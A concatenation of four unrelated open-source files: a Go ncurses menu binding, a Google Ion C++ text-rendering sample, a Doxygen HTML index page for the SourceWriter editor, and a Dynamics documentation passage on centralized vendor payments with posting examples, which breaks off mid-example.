MAX_MENU_COMMAND = C.MAX_MENU_COMMAND
)
type MenusError struct {
message string
}
func (e MenusError) Error() string {
return e.message
}
/*
* Menu functions
*/
func (menu *Menu) CurrentItem() *Item {
return (*Item)(C.current_item((*C.MENU)(menu)))
}
func NewItem(name string, desc string) *Item {
return (*Item)(C.new_item(C.CString(name), C.CString(desc)))
}
func NewMenu(items []*Item) (*Menu, error) {
	menu := (*Menu)(C.new_menu((**C.ITEM)(unsafe.Pointer(&items[0]))))
if menu == nil {
return nil, MenusError{"NewMenu failed"}
}
return menu, nil
}
func (item *Item) Opts() ItemOptions {
return ItemOptions(C.item_opts((*C.ITEM)(item)))
}
func (menu *Menu) Opts() MenuOptions {
return MenuOptions(C.menu_opts((*C.MENU)(menu)))
}
func (item *Item) Description() string {
return C.GoString(C.item_description((*C.ITEM)(item)))
}
func (item *Item) Name() string {
return C.GoString(C.item_name((*C.ITEM)(item)))
}
func (menu *Menu) Mark() string {
return C.GoString(C.menu_mark((*C.MENU)(menu)))
}
func (menu *Menu) SetMark(mark string) bool {
return isOk(C.set_menu_mark((*C.MENU)(menu), C.CString(mark)))
}
func (menu *Menu) Pattern() string {
return C.GoString(C.menu_pattern((*C.MENU)(menu)))
}
func (menu *Menu) Back() Chtype {
return Chtype(C.menu_back((*C.MENU)(menu)))
}
func (menu *Menu) Fore() Chtype {
return Chtype(C.menu_fore((*C.MENU)(menu)))
}
func (menu *Menu) Grey() Chtype {
return Chtype(C.menu_grey((*C.MENU)(menu)))
}
func (item *Item) Free() bool {
return isOk(C.free_item((*C.ITEM)(item)))
}
func (menu *Menu) Free() bool {
return isOk(C.free_menu((*C.MENU)(menu)))
}
func (menu *Menu) ItemCount() int {
return int(C.item_count((*C.MENU)(menu)))
}
func (item *Item) Index() int {
return int(C.item_index((*C.ITEM)(item)))
}
func (item *Item) OptsOn(opt ItemOptions) bool {
return isOk(C.item_opts_on((*C.ITEM)(item), (C.Item_Options)(opt)))
}
func (item *Item) OptsOff(opt ItemOptions) bool {
return isOk(C.item_opts_off((*C.ITEM)(item), (C.Item_Options)(opt)))
}
func (menu *Menu) Drive(req int) bool {
return isOk(C.menu_driver((*C.MENU)(menu), C.int(req)))
}
func (menu *Menu) OptsOn(opt MenuOptions) bool {
return isOk(C.menu_opts_on((*C.MENU)(menu), (C.Menu_Options)(opt)))
}
func (menu *Menu) OptsOff(opt MenuOptions) bool {
return isOk(C.menu_opts_off((*C.MENU)(menu), (C.Menu_Options)(opt)))
}
func (menu *Menu) Pad() int {
return int(C.menu_pad((*C.MENU)(menu)))
}
func (menu *Menu) Post() bool {
return isOk(C.post_menu((*C.MENU)(menu)))
}
func (menu *Menu) Unpost() bool {
return isOk(C.unpost_menu((*C.MENU)(menu)))
}
func (menu *Menu) SetCurrentItem(item *Item) bool {
return isOk(C.set_current_item((*C.MENU)(menu), (*C.ITEM)(item)))
}
func (menu *Menu) SetWin(win *Window) bool {
return isOk(C.set_menu_win((*C.MENU)(menu), (*C.WINDOW)(unsafe.Pointer(win))))
}
func (menu *Menu) Win() *Window {
return (*Window)(unsafe.Pointer((C.menu_win((*C.MENU)(menu)))))
}
func (menu *Menu) SetSub(win *Window) bool {
return isOk(C.set_menu_sub((*C.MENU)(menu), (*C.WINDOW)(unsafe.Pointer(win))))
}
func (menu *Menu) Sub() *Window {
return (*Window)(unsafe.Pointer((C.menu_sub((*C.MENU)(menu)))))
}
func (item *Item) Value() bool {
return intToBool(C.item_value((*C.ITEM)(item)))
}
func (menu *Menu) Scale() (int, int, error) {
var (
rows C.int
cols C.int
)
if C.scale_menu((*C.MENU)(menu), &rows, &cols) != C.OK {
return 0, 0, MenusError{"Form.Scale failed"}
}
return int(rows), int(cols), nil
}
func (item *Item) Visible() bool {
return intToBool(C.item_visible((*C.ITEM)(item)))
}
func (menu *Menu) Format(rows int, cols int) {
cRows := C.int(rows)
cCols := C.int(cols)
C.menu_format((*C.MENU)(menu), &cRows, &cCols)
}
func (item *Item) SetUserPtr(ptr unsafe.Pointer) bool {
return isOk(C.set_item_userptr((*C.ITEM)(item), ptr))
}
func (item *Item) UserPtr() unsafe.Pointer {
return unsafe.Pointer(C.item_userptr((*C.ITEM)(item)))
}
| {
"pile_set_name": "Github"
} |
/**
Copyright 2017 Google Inc. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS-IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
#include <memory>
#include <string>
#include "ion/gfx/node.h"
#include "ion/gfx/renderer.h"
#include "ion/gfx/shaderinputregistry.h"
#include "ion/gfx/shape.h"
#include "ion/gfx/statetable.h"
#include "ion/gfx/uniform.h"
#include "ion/gfxutils/shadermanager.h"
#include "ion/gfxutils/shapeutils.h"
#include "ion/math/matrix.h"
#include "ion/math/range.h"
#include "ion/math/transformutils.h"
#include "ion/math/vector.h"
#include "ion/text/fontimage.h"
#include "ion/text/freetypefont.h"
#include "ion/text/layout.h"
#include "ion/text/outlinebuilder.h"
#include "absl/memory/memory.h"
// This has to be included last or bad things happen on Windows.
#include "GL/freeglut.h"
namespace {
//-----------------------------------------------------------------------------
//
// Font data (public domain TTF) is stored as an array in a header file to
// avoid having to load a file on all platforms at run-time.
//
//-----------------------------------------------------------------------------
static unsigned char kFontData[] = {
#include "./fontdata.h"
};
//-----------------------------------------------------------------------------
//
// Global state to make this program easier.
//
//-----------------------------------------------------------------------------
struct GlobalState {
int window_width;
int window_height;
ion::gfx::NodePtr scene_root;
ion::gfx::RendererPtr renderer;
};
static std::unique_ptr<GlobalState> s_global_state;
//-----------------------------------------------------------------------------
//
// Scene graph construction.
//
//-----------------------------------------------------------------------------
static const ion::text::FontPtr CreateFont() {
static const char kFontName[] = "ExampleFont";
static const size_t kFontSizeInPixels = 64U;
static const size_t kSdfPadding = 8U;
ion::text::FontPtr font(new ion::text::FreeTypeFont(
kFontName, kFontSizeInPixels, kSdfPadding, kFontData, sizeof(kFontData)));
return font;
}
static const ion::gfx::NodePtr BuildTextNode(
const ion::text::FontImagePtr& font_image) {
ion::text::LayoutOptions options;
options.target_size.Set(0.f, 2.f);
options.horizontal_alignment = ion::text::kAlignHCenter;
options.vertical_alignment = ion::text::kAlignVCenter;
options.line_spacing = 1.5f;
const ion::text::Layout layout =
font_image->GetFont()->BuildLayout("Hello,\nWorld!", options);
ion::text::OutlineBuilderPtr outline_builder(new ion::text::OutlineBuilder(
font_image, ion::gfxutils::ShaderManagerPtr(),
ion::base::AllocatorPtr()));
outline_builder->Build(layout, ion::gfx::BufferObject::kStreamDraw);
outline_builder->SetTextColor(ion::math::Vector4f(1.f, 1.f, .4f, 1.f));
outline_builder->SetOutlineColor(ion::math::Vector4f(.1f, .1f, .1f, 1.f));
outline_builder->SetHalfSmoothWidth(2.f);
outline_builder->SetOutlineWidth(6.f);
return outline_builder->GetNode();
}
static const ion::gfx::NodePtr BuildScreenAlignedTextNode(
const ion::text::FontImagePtr& font_image) {
ion::text::LayoutOptions options;
options.target_point.Set(0.1f, 0.f);
options.target_size.Set(0.f, .06f);
options.horizontal_alignment = ion::text::kAlignLeft;
options.vertical_alignment = ion::text::kAlignBottom;
const ion::text::Layout layout =
font_image->GetFont()->BuildLayout("Screen-Aligned text", options);
ion::text::OutlineBuilderPtr outline_builder(new ion::text::OutlineBuilder(
font_image, ion::gfxutils::ShaderManagerPtr(),
ion::base::AllocatorPtr()));
outline_builder->Build(layout, ion::gfx::BufferObject::kStreamDraw);
outline_builder->SetTextColor(ion::math::Vector4f(1.f, .8f, .8f, 1.f));
outline_builder->SetOutlineColor(ion::math::Vector4f(.2f, .2f, .2f, 1.f));
outline_builder->SetHalfSmoothWidth(2.f);
outline_builder->SetOutlineWidth(6.f);
return outline_builder->GetNode();
}
static const ion::gfx::NodePtr BuildGraph(int window_width, int window_height) {
ion::gfx::NodePtr root(new ion::gfx::Node);
const ion::math::Vector2i window_size(window_width, window_height);
ion::gfx::StateTablePtr state_table(
new ion::gfx::StateTable(window_width, window_height));
state_table->SetViewport(
ion::math::Range2i::BuildWithSize(ion::math::Point2i(0, 0), window_size));
state_table->SetClearColor(ion::math::Vector4f(0.3f, 0.3f, 0.5f, 1.0f));
state_table->SetClearDepthValue(1.f);
state_table->Enable(ion::gfx::StateTable::kDepthTest, true);
state_table->Enable(ion::gfx::StateTable::kCullFace, true);
root->SetStateTable(state_table);
const ion::gfx::ShaderInputRegistryPtr& global_reg =
ion::gfx::ShaderInputRegistry::GetGlobalRegistry();
root->AddUniform(global_reg->Create<ion::gfx::Uniform>(
"uViewportSize", window_size));
ion::text::FontPtr font = CreateFont();
static const size_t kFontImageSize = 256U;
ion::text::DynamicFontImagePtr font_image(
new ion::text::DynamicFontImage(font, kFontImageSize));
ion::gfx::NodePtr text_node = BuildTextNode(font_image);
text_node->AddUniform(global_reg->Create<ion::gfx::Uniform>(
"uProjectionMatrix",
ion::math::PerspectiveMatrixFromView(ion::math::Anglef::FromDegrees(60.f),
1.f, .1f, 10.f)));
text_node->AddUniform(global_reg->Create<ion::gfx::Uniform>(
"uModelviewMatrix",
ion::math::LookAtMatrixFromCenter(ion::math::Point3f(2.f, 2.f, 4.f),
ion::math::Point3f::Zero(),
ion::math::Vector3f::AxisY())));
root->AddChild(text_node);
ion::gfx::NodePtr aligned_text_node = BuildScreenAlignedTextNode(font_image);
aligned_text_node->AddUniform(global_reg->Create<ion::gfx::Uniform>(
"uProjectionMatrix",
ion::math::OrthographicMatrixFromFrustum(0.f, 1.f, 0.f, 1.f, -1.f, 1.f)));
aligned_text_node->AddUniform(global_reg->Create<ion::gfx::Uniform>(
"uModelviewMatrix", ion::math::Matrix4f::Identity()));
root->AddChild(aligned_text_node);
return root;
}
//-----------------------------------------------------------------------------
//
// FreeGLUT callback functions.
//
//-----------------------------------------------------------------------------
static void Resize(int w, int h) {
s_global_state->window_width = w;
s_global_state->window_height = h;
glutPostRedisplay();
}
static void Render() {
if (s_global_state)
s_global_state->renderer->DrawScene(s_global_state->scene_root);
glutSwapBuffers();
}
static void Update() {
glutPostRedisplay();
}
static void Keyboard(unsigned char key, int x, int y) {
glutPostRedisplay();
}
static void KeyboardUp(unsigned char key, int x, int y) {
switch (key) {
case 27: // Escape.
s_global_state.reset(nullptr);
glutLeaveMainLoop();
break;
}
glutPostRedisplay();
}
} // anonymous namespace
//-----------------------------------------------------------------------------
//
// Mainline.
//
//-----------------------------------------------------------------------------
int main(int argc, char* argv[]) {
glutInit(&argc, argv);
s_global_state = absl::make_unique<GlobalState>();
s_global_state->window_width = s_global_state->window_height = 800;
s_global_state->scene_root = BuildGraph(s_global_state->window_width,
s_global_state->window_height);
glutInitDisplayMode(GLUT_RGBA | GLUT_DOUBLE | GLUT_DEPTH | GLUT_MULTISAMPLE);
glutSetOption(GLUT_MULTISAMPLE, 16);
glutInitWindowSize(s_global_state->window_width,
s_global_state->window_height);
glutCreateWindow("Ion rectangle example");
glutDisplayFunc(Render);
glutReshapeFunc(Resize);
glutKeyboardFunc(Keyboard);
glutKeyboardUpFunc(KeyboardUp);
glutIdleFunc(Update);
// Can't do this before GLUT creates the OpenGL context.
ion::gfx::GraphicsManagerPtr graphics_manager(new ion::gfx::GraphicsManager);
s_global_state->renderer.Reset(new ion::gfx::Renderer(graphics_manager));
glutMainLoop();
}
| {
"pile_set_name": "Github"
} |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=9"/>
<meta name="generator" content="Doxygen 1.8.11"/>
<title>SourceWriter: Class Members - Functions</title>
<link href="tabs.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="jquery.js"></script>
<script type="text/javascript" src="dynsections.js"></script>
<link href="navtree.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="resize.js"></script>
<script type="text/javascript" src="navtreedata.js"></script>
<script type="text/javascript" src="navtree.js"></script>
<script type="text/javascript">
$(document).ready(initResizable);
$(window).load(resizeHeight);
</script>
<link href="search/search.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="search/searchdata.js"></script>
<script type="text/javascript" src="search/search.js"></script>
<script type="text/javascript">
$(document).ready(function() { init_search(); });
</script>
<link href="doxygen.css" rel="stylesheet" type="text/css" />
</head>
<body>
<div id="top"><!-- do not remove this div, it is closed by doxygen! -->
<div id="titlearea">
<table cellspacing="0" cellpadding="0">
<tbody>
<tr style="height: 56px;">
<td id="projectlogo"><img alt="Logo" src="icon_128x128.png"/></td>
<td id="projectalign" style="padding-left: 0.5em;">
<div id="projectname">SourceWriter
 <span id="projectnumber">01.00.00</span>
</div>
<div id="projectbrief">A simple, syntax highlighting code editor</div>
</td>
</tr>
</tbody>
</table>
</div>
<!-- end header part -->
<!-- Generated by Doxygen 1.8.11 -->
<script type="text/javascript">
var searchBox = new SearchBox("searchBox", "search",false,'Search');
</script>
<div id="navrow1" class="tabs">
<ul class="tablist">
<li><a href="index.html"><span>Main Page</span></a></li>
<li><a href="namespaces.html"><span>Packages</span></a></li>
<li class="current"><a href="annotated.html"><span>Classes</span></a></li>
<li>
<div id="MSearchBox" class="MSearchBoxInactive">
<span class="left">
<img id="MSearchSelect" src="search/mag_sel.png"
onmouseover="return searchBox.OnSearchSelectShow()"
onmouseout="return searchBox.OnSearchSelectHide()"
alt=""/>
<input type="text" id="MSearchField" value="Search" accesskey="S"
onfocus="searchBox.OnSearchFieldFocus(true)"
onblur="searchBox.OnSearchFieldFocus(false)"
onkeyup="searchBox.OnSearchFieldChange(event)"/>
</span><span class="right">
<a id="MSearchClose" href="javascript:searchBox.CloseResultsWindow()"><img id="MSearchCloseImg" border="0" src="search/close.png" alt=""/></a>
</span>
</div>
</li>
</ul>
</div>
<div id="navrow2" class="tabs2">
<ul class="tablist">
<li><a href="annotated.html"><span>Class List</span></a></li>
<li><a href="classes.html"><span>Class Index</span></a></li>
<li><a href="inherits.html"><span>Class Hierarchy</span></a></li>
<li class="current"><a href="functions.html"><span>Class Members</span></a></li>
</ul>
</div>
<div id="navrow3" class="tabs2">
<ul class="tablist">
<li><a href="functions.html"><span>All</span></a></li>
<li class="current"><a href="functions_func.html"><span>Functions</span></a></li>
<li><a href="functions_vars.html"><span>Variables</span></a></li>
<li><a href="functions_enum.html"><span>Enumerations</span></a></li>
<li><a href="functions_prop.html"><span>Properties</span></a></li>
<li><a href="functions_evnt.html"><span>Events</span></a></li>
</ul>
</div>
<div id="navrow4" class="tabs3">
<ul class="tablist">
<li><a href="functions_func.html#index_a"><span>a</span></a></li>
<li><a href="functions_func_b.html#index_b"><span>b</span></a></li>
<li><a href="functions_func_c.html#index_c"><span>c</span></a></li>
<li><a href="functions_func_d.html#index_d"><span>d</span></a></li>
<li><a href="functions_func_e.html#index_e"><span>e</span></a></li>
<li><a href="functions_func_f.html#index_f"><span>f</span></a></li>
<li><a href="functions_func_g.html#index_g"><span>g</span></a></li>
<li><a href="functions_func_h.html#index_h"><span>h</span></a></li>
<li><a href="functions_func_i.html#index_i"><span>i</span></a></li>
<li><a href="functions_func_k.html#index_k"><span>k</span></a></li>
<li><a href="functions_func_l.html#index_l"><span>l</span></a></li>
<li class="current"><a href="functions_func_m.html#index_m"><span>m</span></a></li>
<li><a href="functions_func_n.html#index_n"><span>n</span></a></li>
<li><a href="functions_func_o.html#index_o"><span>o</span></a></li>
<li><a href="functions_func_p.html#index_p"><span>p</span></a></li>
<li><a href="functions_func_r.html#index_r"><span>r</span></a></li>
<li><a href="functions_func_s.html#index_s"><span>s</span></a></li>
<li><a href="functions_func_t.html#index_t"><span>t</span></a></li>
<li><a href="functions_func_u.html#index_u"><span>u</span></a></li>
<li><a href="functions_func_v.html#index_v"><span>v</span></a></li>
<li><a href="functions_func_w.html#index_w"><span>w</span></a></li>
<li><a href="functions_func_x.html#index_x"><span>x</span></a></li>
<li><a href="functions_func_z.html#index_z"><span>z</span></a></li>
</ul>
</div>
</div><!-- top -->
<div id="side-nav" class="ui-resizable side-nav-resizable">
<div id="nav-tree">
<div id="nav-tree-contents">
<div id="nav-sync" class="sync"></div>
</div>
</div>
<div id="splitbar" style="-moz-user-select:none;"
class="ui-resizable-handle">
</div>
</div>
<script type="text/javascript">
$(document).ready(function(){initNavTree('functions_func_m.html','');});
</script>
<div id="doc-content">
<!-- window showing the filter options -->
<div id="MSearchSelectWindow"
onmouseover="return searchBox.OnSearchSelectShow()"
onmouseout="return searchBox.OnSearchSelectHide()"
onkeydown="return searchBox.OnSearchSelectKey(event)">
</div>
<!-- iframe showing the search results (closed by default) -->
<div id="MSearchResultsWindow">
<iframe src="javascript:void(0)" frameborder="0"
name="MSearchResults" id="MSearchResults">
</iframe>
</div>
<div class="contents">
 
<h3><a class="anchor" id="index_m"></a>- m -</h3><ul>
<li>Main()
: <a class="el" href="class_source_writer_1_1_main_class.html#a33b8365e5246df4be685519019834bb7">SourceWriter.MainClass</a>
</li>
<li>ManualToolbarItem()
: <a class="el" href="class_app_kit_1_1_manual_toolbar_item.html#a8671abaca578f1c04204ecbad044cb8b">AppKit.ManualToolbarItem</a>
</li>
<li>Markdown()
: <a class="el" href="class_markdown_sharp_1_1_markdown.html#a79c6bf2c4157c82953866862e32ba86b">MarkdownSharp.Markdown</a>
</li>
<li>MarkDownDescriptor()
: <a class="el" href="class_app_kit_1_1_text_kit_1_1_formatter_1_1_mark_down_descriptor.html#a0e58bf2fe3ed90d0a300814514dbf7f5">AppKit.TextKit.Formatter.MarkDownDescriptor</a>
</li>
<li>MatchesCharacter()
: <a class="el" href="class_app_kit_1_1_text_kit_1_1_formatter_1_1_format_descriptor.html#a9241c317e43ad031ac53c2463177c7a7">AppKit.TextKit.Formatter.FormatDescriptor</a>
</li>
</ul>
</div><!-- contents -->
</div><!-- doc-content -->
<!-- start footer part -->
<div id="nav-path" class="navpath"><!-- id is needed for treeview function! -->
<ul>
<li class="footer">Generated on Thu Feb 18 2016 10:34:52 for SourceWriter by
<a href="http://www.doxygen.org/index.html">
<img class="footer" src="doxygen.png" alt="doxygen"/></a> 1.8.11 </li>
</ul>
</div>
</body>
</html>
| {
"pile_set_name": "Github"
} |
---
# required metadata
title: Centralized payments for Accounts payable
description: Organizations that include multiple legal entities can create and manage payments by using a single legal entity that handles all payments. Therefore, the same payments don't have to be entered in multiple legal entities. This article provides examples that show how posting for centralized payments is handled in various scenarios.
author: abruer
manager: AnnBe
ms.date: 02/12/2017
ms.topic: article
ms.prod:
ms.service: dynamics-ax-applications
ms.technology:
# optional metadata
ms.search.form: LedgerJournalTransVendPaym, VendOpenTrans
# ROBOTS:
audience: Application User
# ms.devlang:
ms.reviewer: roschlom
ms.search.scope: Core, Operations
# ms.tgt_pltfrm:
ms.custom: 14341
ms.assetid: 7bd02e32-2416-4ac6-8a60-85525267fdb7
ms.search.region: Global
# ms.search.industry:
ms.author: shpandey
ms.search.validFrom: 2016-02-28
ms.dyn365.ops.version: AX 7.0.0
---
# Centralized payments for Accounts payable
[!include [banner](../includes/banner.md)]
Organizations that include multiple legal entities can create and manage payments by using a single legal entity that handles all payments. Therefore, the same payments don't have to be entered in multiple legal entities. This article provides examples that show how posting for centralized payments is handled in various scenarios.
Organizations that include multiple legal entities can create and manage payments by using a legal entity that handles all payments. Therefore, the same payments don't have to be entered in multiple legal entities. Additionally, the organization saves time, because the payment process is streamlined.
In a centralized payments organization, there are many legal entities for operations, and each operating legal entity manages its own vendor invoices. Payments for all the operating legal entities are generated from a single legal entity, which is known as the legal entity of the payment. During the settlement process, the applicable due-to and due-from transactions are generated. You can specify which legal entity in the organization receives the realized gain or realized loss transactions, and how cash discount transactions that are related to a cross-company payment are handled. On the centralized payment journal line, the **Account type** should be set to Vendor. The **Offset account type** should be set to Bank or Ledger. The bank account should be in the current company.
The following examples illustrate how posting is handled in various scenarios. The following configuration is assumed for all these examples:
- The legal entities are Fabrikam, Fabrikam East, and Fabrikam West. Payments are made from Fabrikam.
- The **Post cash discount** field on the **Intercompany accounting** page is set to **Legal entity of the invoice**.
- The **Post currency exchange gain or loss** field on the **Intercompany accounting** page is set to **Legal entity of the payment**.
- The vendor Fourth Coffee is set up as a vendor in each legal entity. The vendors from the various legal entities are identified as the same vendor because they share the same global address book ID.
| Directory ID | Vendor account | Name | Legal entity |
|--------------|----------------|---------------|---------------|
| 1050 | 3004 | Fourth Coffee | Fabrikam |
| 1050 | 100 | Fourth Coffee | Fabrikam East |
| 1050 | 3004 | Fourth Coffee | Fabrikam West |
## Example 1: Vendor payment of invoice from another legal entity
Fabrikam East has an open invoice for vendor account 100, Fourth Coffee. Fabrikam enters and posts a payment to Fabrikam vendor account 3004, Fourth Coffee. The payment is settled with the open invoice.
### Invoice is posted in Fabrikam East for vendor 100
| Account | Debit amount | Credit amount |
|----------------------------------|--------------|---------------|
| Expense (Fabrikam East) | 600.00 | |
| Accounts payable (Fabrikam East) | | 600.00 |
### Payment is generated and posted in Fabrikam for vendor 3004
| Account | Debit amount | Credit amount |
|-----------------------------|--------------|---------------|
| Accounts payable (Fabrikam) | 600.00 | |
| Cash (Fabrikam) | | 600.00 |
### Fabrikam payment is settled with Fabrikam East invoice
**Fabrikam posting**
| Account | Debit amount | Credit amount |
|-----------------------------------|--------------|---------------|
| Due from Fabrikam East (Fabrikam) | 600.00 | |
| Accounts payable (Fabrikam) | | 600.00 |
**Fabrikam East posting**
| Account | Debit amount | Credit amount |
|----------------------------------|--------------|---------------|
| Accounts payable (Fabrikam East) | 600.00 | |
| Due to Fabrikam (Fabrikam East) | | 600.00 |
## Example 2: Vendor payment of invoice from another legal entity with cash discount
Fabrikam East has an open invoice for vendor 100, Fourth Coffee. The invoice has a 20.00 cash discount available. Fabrikam enters and posts a payment of 580.00 for Fabrikam vendor 3004, Fourth Coffee. The payment is settled with the open Fabrikam East invoice. The cash discount is posted to the legal entity of the invoice, Fabrikam East.
### Invoice is posted in Fabrikam East for Fabrikam East vendor 100
| Account | Debit amount | Credit amount |
|----------------------------------|--------------|---------------|
| Expense (Fabrikam East) | 600.00 | |
| Accounts payable (Fabrikam East) | | 600.00 |
### Payment is generated and posted in Fabrikam for Fabrikam vendor 3004
| Account | Debit amount | Credit amount |
|-----------------------------|--------------|---------------|
| Accounts payable (Fabrikam) | 580.00 | |
| Cash (Fabrikam) | | 580.00 |
### Fabrikam payment is settled with Fabrikam East invoice
**Fabrikam posting**
| Account | Debit amount | Credit amount |
|-----------------------------------|--------------|---------------|
| Due from Fabrikam East (Fabrikam) | 580.00 | |
| Accounts payable (Fabrikam) | | 580.00 |
**Fabrikam East posting**
| Account | Debit amount | Credit amount |
|----------------------------------|--------------|---------------|
| Accounts payable (Fabrikam East) | 580.00 | |
| Due to Fabrikam (Fabrikam East) | | 580.00 |
| Accounts payable (Fabrikam East) | 20.00 | |
| Cash discount (Fabrikam East) | | 20.00 |
## Example 3: Vendor payment of invoice from another legal entity with realized exchange rate loss
Fabrikam East has an open invoice for vendor 100, Fourth Coffee. Fabrikam enters and posts a payment for Fabrikam vendor 3004, Fourth Coffee. The payment is settled with the open Fabrikam East invoice. A currency exchange loss transaction is generated during the settlement process.
- Exchange rate for euros (EUR) to U.S. dollars (USD) as of the invoice date: 1.2062
- Exchange rate for EUR to USD as of the payment date: 1.2277
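With these rates, the loss works out as follows: the 600.00 EUR invoice is recorded at 600.00 × 1.2062 = 723.72 USD on the invoice date, but settling it on the payment date costs 600.00 × 1.2277 = 736.62 USD, so a realized loss of 736.62 − 723.72 = 12.90 USD is posted to Fabrikam, the legal entity of the payment.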
### Invoice is posted in Fabrikam East for Fabrikam East vendor 100
| Account | Debit amount | Credit amount |
|----------------------------------|-------------------------|-------------------------|
| Expense (Fabrikam East) | 600.00 EUR / 723.72 USD | |
| Accounts payable (Fabrikam East) | | 600.00 EUR / 723.72 USD |
### Payment is generated and posted in Fabrikam for Fabrikam vendor 3004
| Account | Debit amount | Credit amount |
|-----------------------------|-------------------------|-------------------------|
| Accounts payable (Fabrikam) | 600.00 EUR / 736.62 USD | |
| Cash (Fabrikam) | | 600.00 EUR / 736.62 USD |
### Fabrikam payment is settled with Fabrikam East invoice
**Fabrikam posting**
| Account | Debit amount | Credit amount |
|-----------------------------------|-------------------------|-------------------------|
| Due from Fabrikam East (Fabrikam) | 600.00 EUR / 736.62 USD | |
| Accounts payable (Fabrikam) | | 600.00 EUR / 736.62 USD |
| Realized loss (Fabrikam) | 0.00 EUR / 12.90 USD | |
| Due from Fabrikam East (Fabrikam) | | 0.00 EUR / 12.90 USD |
**Fabrikam East posting**
| Account | Debit amount | Credit amount |
|----------------------------------|-------------------------|-------------------------|
| Accounts payable (Fabrikam East) | 600.00 EUR / 736.62 USD | |
| Due to Fabrikam (Fabrikam East) | | 600.00 EUR / 736.62 USD |
| Due to Fabrikam (Fabrikam East) | 0.00 EUR / 12.90 USD | |
| Accounts payable (Fabrikam East) | | 0.00 EUR / 12.90 USD |
## Example 4: Vendor payment of invoice from another legal entity with cash discount and realized exchange rate loss
Fabrikam East has an open invoice for vendor 100, Fourth Coffee. The invoice has a cash discount available, and a sales tax transaction is generated. Fabrikam posts a payment for Fabrikam vendor 3004, Fourth Coffee. The payment is settled with the open Fabrikam East invoice. A currency exchange loss transaction is generated during the settlement process. The cash discount is posted to the legal entity of the invoice (Fabrikam East), and the currency exchange loss is posted to the legal entity of the payment (Fabrikam).
- Exchange rate for EUR to USD as of the invoice date: 1.2062
- Exchange rate for EUR to USD as of the payment date: 1.2277
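In this example, the 588.72 EUR payment reflects an 11.28 EUR cash discount on the 600.00 EUR invoice (600.00 − 588.72 = 11.28 EUR, worth 11.28 × 1.2062 = 13.61 USD at the invoice-date rate), and the realized loss is calculated on the amount actually paid: 588.72 × (1.2277 − 1.2062) = 12.66 USD, posted to Fabrikam as the legal entity of the payment.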
### Invoice is posted and a tax transaction is generated in Fabrikam East for vendor 100
| Account | Debit amount | Credit amount |
|----------------------------------|-------------------------|-------------------------|
| Expense (Fabrikam East) | 564.07 EUR / 680.38 USD | |
| Sales tax (Fabrikam East) | 35.93 EUR / 43.34 USD | |
| Accounts payable (Fabrikam East) | | 600.00 EUR / 723.72 USD |
### Payment is generated and posted in Fabrikam for vendor 3004
| Account | Debit amount | Credit amount |
|-----------------------------|-------------------------|-------------------------|
| Accounts payable (Fabrikam) | 588.72 EUR / 722.77 USD | |
| Cash (Fabrikam East) | | 588.72 EUR / 722.77 USD |
### Fabrikam payment is settled with Fabrikam East invoice
**Fabrikam posting**
| Account | Debit amount | Credit amount |
|-----------------------------------|-------------------------|-------------------------|
| Due from Fabrikam East (Fabrikam) | 588.72 EUR / 722.77 USD | |
| Accounts payable (Fabrikam) | | 588.72 EUR / 722.77 USD |
| Realized loss (Fabrikam) | 0.00 EUR / 12.66 USD | |
| Due from Fabrikam East (Fabrikam) | | 0.00 EUR / 12.66 USD |
**Fabrikam East posting**
| Account | Debit amount | Credit amount |
|----------------------------------|-------------------------|-------------------------|
| Accounts payable (Fabrikam East) | 588.72 EUR / 722.77 USD | |
| Due to Fabrikam (Fabrikam East) | | 588.72 EUR / 722.77 USD |
| Due to Fabrikam (Fabrikam East)  | 0.00 EUR / 12.66 USD    |                         |
| Accounts payable (Fabrikam East) | | 0.00 EUR / 12.66 USD |
| Accounts payable (Fabrikam East) | 11.28 EUR / 13.61 USD | |
| Cash discount (Fabrikam East) | | 11.28 EUR / 13.61 USD |
## Example 5: Vendor credit note with primary payment
Fabrikam generates a payment of 75.00 for vendor 3004, Fourth Coffee. The payment is settled with an open invoice for Fabrikam West vendor 3004 and an open credit note for Fabrikam East vendor 100. The payment is selected as the primary payment on the **Settle transactions** page.
### Invoice is posted to Fabrikam West for vendor 3004
| Account | Debit amount | Credit amount |
|----------------------------------|--------------|---------------|
| Expense (Fabrikam West) | 100.00 | |
| Accounts payable (Fabrikam West) | | 100.00 |
### Credit note is posted to Fabrikam East for vendor 100
| Account | Debit amount | Credit amount |
|----------------------------------|--------------|---------------|
| Accounts payable (Fabrikam East) | 25.00 | |
| Purchase returns (Fabrikam East) | | 25.00 |
### Payment is posted to Fabrikam for vendor 3004
| Account | Debit amount | Credit amount |
|-----------------------------|--------------|---------------|
| Accounts payable (Fabrikam) | 75.00 | |
| Cash (Fabrikam) | | 75.00 |
### Fabrikam payment is settled with Fabrikam West invoice and Fabrikam East credit note
**Fabrikam posting**
| Account | Debit amount | Credit amount |
|-----------------------------------|--------------|---------------|
| Accounts payable (Fabrikam) | 25.00 | |
| Due to Fabrikam East (Fabrikam) | | 25.00 |
| Due from Fabrikam West (Fabrikam) | 100.00 | |
| Accounts payable (Fabrikam) | | 100.00 |
**Fabrikam East posting**
| Account | Debit amount | Credit amount |
|-----------------------------------|--------------|---------------|
| Due from Fabrikam (Fabrikam East) | 25.00 | |
| Accounts payable (Fabrikam East) | | 25.00 |
**Fabrikam West posting**
| Account | Debit amount | Credit amount |
|----------------------------------|--------------|---------------|
| Accounts payable (Fabrikam West) | 100.00 | |
| Due to Fabrikam (Fabrikam West) | | 100.00 |
## Example 6: Vendor credit note without primary payment
Fabrikam generates a payment of 75.00 for vendor 3004, Fourth Coffee. The payment is settled with an open invoice for Fabrikam West vendor 3004 and an open credit note for Fabrikam East vendor 100. The payment isn't selected as the primary payment on the **Settle transactions** page.
### Invoice is posted to Fabrikam West for vendor 3004
